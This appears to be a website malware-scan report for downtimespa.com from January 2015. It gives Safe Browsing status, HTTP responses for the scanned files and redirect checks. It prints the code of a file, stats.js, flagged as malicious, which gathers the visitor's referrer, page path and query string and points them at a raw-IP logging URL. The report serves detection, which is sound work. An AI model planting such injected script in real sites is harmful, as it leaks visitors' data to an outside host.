Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=downtimespa.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://downtimespa.com/ | 200 OK Content-Length: 2865 Content-Type: text/html | clean |
http://downtimespa.com/index2.html | 200 OK Content-Length: 2124 Content-Type: text/html | clean |
http://downtimespa.com/./stats.js | 200 OK Content-Length: 6443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var stats_url = 'http://38.119.168.21/log.aspx'; var page_name = 'index.html'; var o_r = document.referrer; var o_p = window.location.pathname.substring( window.location.pathname.lastIndexOf('/') ); if (o_p == '/') { o_p = page_name; } else { o_p = o_p.substring(1); } var o_q = location.search.substring(1).replace(/\s/g," "); document.write(''); Antivirus reports:
| ||
http://downtimespa.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 09:56:00 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://downtimespa.com/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 09:56:02 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://downtimespa.com/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 09:56:04 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://downtimespa.com/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 09:56:04 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://downtimespa.com/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 12 Jan 2015 09:56:04 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: downtimespa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 09:55:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2865
Content-Type: text/html
Last-Modified: Sun, 02 Nov 2014 04:15:07 GMT
...2865 bytes of data.
GET / HTTP/1.1
Host: downtimespa.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 09:55:58 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 2865
Content-Type: text/html
Last-Modified: Sun, 02 Nov 2014 04:15:07 GMT
...2865 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: downtimespa.com
Referer: http://www.google.com/search?q=downtimespa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: downtimespa.com
Referer: http://www.google.com/search?q=downtimespa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.